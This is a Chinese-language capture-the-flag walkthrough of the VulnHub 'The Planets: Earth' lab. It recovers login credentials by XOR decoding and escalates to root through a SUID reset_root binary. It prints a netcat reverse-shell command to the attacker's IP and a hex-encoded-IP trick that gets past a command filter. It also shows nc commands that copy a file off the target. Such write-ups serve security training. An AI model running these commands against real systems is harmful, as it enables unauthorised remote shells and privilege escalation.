vulnhub——The Planets: Earth

攻击机：kali

靶场：The Planets: Earth

靶场和攻击机均使用vmware打开，网卡配置为NAT模式

目录

主机发现与端口扫描

添加域名信息后访问站点

dirb目录扫描

使用CyberChef进行XOR运算

nc反弹shell

查找可以利用的suid程序

使用nc将文件传送至本地

使用ltrace跟踪进程调用库函数的情况

---

主机发现与端口扫描

发现目标IP地址

知道IP地址后开始进行端口扫描，发现开启了22，80，443端口，80端口回复状态码为400，扫描显示443端口需要配置dns

添加域名信息后访问站点

在hosts文件中写入主机到域名的映射

然后访问网站，earth.local显示如下。terratest.earth.local显示测试站点，让我们忽略

站点有一个表单，随便填入一些信息，点击send message后，疑似发送了一个信息。历史信息中增加了一条新的代码

dirb目录扫描

暂时先不管这些了，在其他地方没有找到有价值的信息，尝试对两个域名进行目录扫描

earth.local

貌似发现了一个登录口，尝试进行访问，是一个登录窗口，简单测试后暂时先放下，扫描另一个域名

terratest.earth.local

对扫描结果进行访问，robots.txt记录了网站爬虫规则

禁止爬取很多后缀的文件，还有一个testingnotes为前缀的文件，设想是否以testingnotes为前缀名，拼接上面的后缀名，会获取一些信息，最终，在/testingnotes.txt中发现了一些内容

提示网站使用了XOR（异或）加密算法，第二句提示地球已经确认了收到了我们发送的信息，第三句话说testdata.txt之前被用来测试加密，第四句说terra之前是用户名

使用CyberChef进行XOR运算

先尝试拼接url获取testdata.txt的内容

刚才发现了一个传送信息的地址，原本底下有三句话，尝试将文本中的内容与之前那三行代码分别进行异或运算

使用CyberChef

搜索XOR并使用，将testdata.txt中的内容加入key中，将三行代码其中一行加入input，设置utf-8

逐一使用，最终发现可能的密码

使用terra:earthclimatechangebad4humans登录，登陆成功，发现可以使用CLI命令

nc反弹shell

判断目标系统有nc，尝试用nc反弹shell

在kali中开启监听

在CLI命令窗口中执行 nc 192.168.74.128 1234 -e /bin/bash ，发现失败

提示远程连接被禁止，在经过测试发现ping也被禁止，提示仍然是远程连接被禁止，猜测可能不允许输入IP地址，尝试将IP地址转换为其他格式

将IP地址转化成16进制

在CLI命令窗口中输入 nc 0xc0.0xa8.0x4a.0x80 1234 -e /bin/bash ，然后点击run command后成功反弹shell到kali

获取交互式shell

查找可以利用的suid程序

find / -perm -u=s -type f 2>/dev/null

尝试查看该文件内容，使用cat打开乱码，使用strings发现可以更改root密码

执行失败

使用nc将文件传送至本地

尝试将该文件传送至本地，使用nc

在kali中再次开启一个监听

 nc -nvlp 4444 > reset_root 

在靶标中传送文件

nc 192.168.74.128 4444 < /usr/bin/reset_root

在kali中找到文件

使用ltrace跟踪进程调用库函数的情况

先给reset_root文件加执行权限，然后使用ltrace进行调试

发现执行程序失败的的原因是少了3个文件

在目标中创建这3个文件

然后重新执行该程序，直接将密码重置为Earth

切换用户，输入密码

查看flag，这个时候重新看了靶场说明，才知道原来有两个flag

user_flag.txt

root_flag.txt